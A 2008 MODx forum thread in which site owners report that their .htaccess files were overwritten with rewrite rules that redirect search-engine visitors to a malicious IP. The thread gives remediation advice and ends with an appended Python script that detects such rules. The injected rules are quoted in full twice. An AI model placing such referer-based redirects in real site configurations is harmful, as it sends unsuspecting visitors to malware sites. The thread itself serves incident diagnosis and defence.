    • 30585
    • 833 Posts
    Hi guys,

    I’m not sure if this issue has been reported yet. Every other day when a user tries to surf our site, the only page available to them is the home page. When they try to follow a link from the home page to another page or even access it directly, they get the default “page unavailable” document.

    Initially I had to reinstall MODx to fix the issue, but that’s just not an effective way of solving the problem.

    I found out later that the issue was related to the .htaccess file. Apparently everything in the file was removed and replaced with what seems to be some search engine rewrites:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.205/in.html?s=hh1 [R,L]


    This doesn’t seem right and I’m afraid we might be victim to an attack.

    We’re running MODx 0.9.6.2 with Register_globals off on the .ini file and Validate HTTP_REFERER set to ON.
    Does anyone know anything about this?

    Thanks a lot for any help

      A MODx Fanatic
      • 10449
      • 956 Posts
      Is / was your .htaccess file set to CHMOD 0755 or 0777? It should be 0644.

      Is your site on a shared hosting account?
        • 10449
        • 956 Posts
        Also, remove the Reflect snippet from the server: http://www.itconsmedia.net/assets/snippets/reflect/
        And make sure the directory listing is deactivated by Apache.
          • 30585
          • 833 Posts
          I’m impressed,

          How did you find out so fast that I’m with itCons Media. I guess the profile speaks it loud.
          But let me try those steps, bear with me please
            A MODx Fanatic
            • 30585
            • 833 Posts
            Quote from: treigh at Dec 09, 2008, 06:16 PM

            I’m impressed,

            How did you find out so fast that I’m with itCons Media. I guess the profile speaks it loud.
            But let me try those steps, bear with me please

            The domain I’m having issues with is on a shared hosting account. Is that a problem?
              A MODx Fanatic
              • 27442
              • 103 Posts
              The first thing you should do is change the password for your hosting account itself. It’s quite possible (and likely) that someone is accessing your files (including .htaccess) directly through the hosting account, not modx.
                • 30585
                • 833 Posts
                Right on!

                I just spoke with the hosting company and it seems many other users are having the same problem. They’re saying that it’s caused by a spyware software (Antivirus 2009) that would be running on the user’s machine and would be searching for FTP account access. But I don’t buy that at all because I don’t see how all these users would be having the exact same problem at the same time and they seem to have the fix as soon as you inquire about it. I suspect they’ve been hacked at the server level and they don’t know how to explain it to the users.

                Nonetheless I did a few changes to the FTP security and I’m glad that MODx had apparently nothing to do with it.
                I hope that at least this post raised everyone’s vigilance to a higher level like it should. Even when you’re tired, check your site to make sure it’s running like it should be.

                Thanks folks
                  A MODx Fanatic
                  • 26504
                  • 3 Posts
                  I have also encountered the problem, my .htaccess set to 644, still being revised.
                  I changed to 444 now. Hope that will not be revised once again.

                  Thank you for sharing.
                  I think this is an ixwebhosting server security problem,
                  a large number of my friends who use Ixwebhosting have seen this issue.

                  My website is http://laptopsbattery.us, when somebody clicks my site from google or yahoo, the page will be rewritten to http:// 89.28.13.205/ this site is a virus site
                  I hate hackers.
                    when somebody clicks my site Laptop Batteries from google or yahoo, the page will be rewritten to http:// 89.28.13.205/ this site is a virus site, who can tell me why.
                    • 33372
                    • 1,611 Posts
                    Quote from: Seanax at Dec 10, 2008, 03:13 AM

                    I have also encountered the problem, my .htaccess set to 644, still being revised.
                    I changed to 444 now. Hope that will not be revised once again.

                    If the server has been hacked, then changing file permissions probably won’t help. If a hacker has shell or FTP access via an account that can access your files, then they essentially have the same access level as you do. And if they had access previously, they may have left back door scripts hidden amongst your files that they could use to gain access again if the original way that they entered were blocked.

                    In this situation, I would delete all of the files in my account (or ask the host to create a new account for me) and reupload all of your files from a clean local backup. Before you do that, you should change all of your passwords (FTP, Control Panel, MySQL, MODx, etc.). That’s the only way to be sure that your website’s files are not infected with hacker code.

                    It’s certainly possible that the host has been rooted, in which case the only immediate solution is to change hosts. It’s also not that far-fetched that a virus or trojan program was used to steal login credentials, since that actually happens a lot. So make sure that all of the computers that have your login info on them are virus-free as well.
                      • 6770
                      • 1 Posts
                      I have the same problem.
                      My own .htaccess file has been changed to:
                      ======================================
                      RewriteEngine On
                      RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
                      RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
                      RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
                      RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
                      RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
                      RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
                      RewriteRule .* http://89.28.13.205/in.html?s=xx [R,L]
                      ======================================

                      Then I upload my backup .htaccess file to cover the changed .htaccess.
                      But two or three days later, the .htaccess will be changed again.
                      I don’t know how to avoid the changes, any help?
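
Added example, not posted by anyone in this thread and not MODx code: a small Python check for the pattern both posters found in their .htaccess files, where RewriteCond tests on HTTP_REFERER gate a RewriteRule that redirects to a foreign host. The function name, the `own_hosts` parameter and the benign front-controller rule in the sample are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: injected rules as quoted in this thread, followed by a
# benign front-controller rule of the kind a CMS ships (assumed, for contrast).
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.205/in.html?s=hh1 [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
"""

# Directive name, two whitespace-separated arguments, optional [flags].
DIRECTIVE = re.compile(
    r"^\s*(RewriteCond|RewriteRule)\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

def find_referer_redirects(text, own_hosts=()):
    """Flag RewriteRules that send visitors to a host outside own_hosts only
    when the Referer header matches, i.e. search-engine-only redirects."""
    findings, conds = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue
        kind, arg1, arg2, flags = m.group(1).lower(), m.group(2), m.group(3), m.group(4) or ""
        if kind == "rewritecond":
            conds.append((arg1, arg2))  # (test string, pattern)
            continue
        # A RewriteRule consumes the conditions collected directly above it.
        target = urlsplit(arg2)
        external = target.scheme in ("http", "https") and target.hostname not in own_hosts
        referer_pats = [pat for test, pat in conds if "HTTP_REFERER" in test.upper()]
        if external and referer_pats:
            findings.append({"line": lineno, "host": target.hostname,
                             "referer_patterns": referer_pats, "flags": flags})
        conds = []
    return findings

if __name__ == "__main__":
    for f in find_referer_redirects(SAMPLE, own_hosts={"www.example.org"}):
        print(f"line {f['line']}: referer-gated redirect to {f['host']} {f['referer_patterns']}")
```

Since the posters report the file being rewritten again days after a restore, a check like this is most useful run on a schedule over every .htaccess under the web root, alongside the credential changes and clean re-upload recommended above.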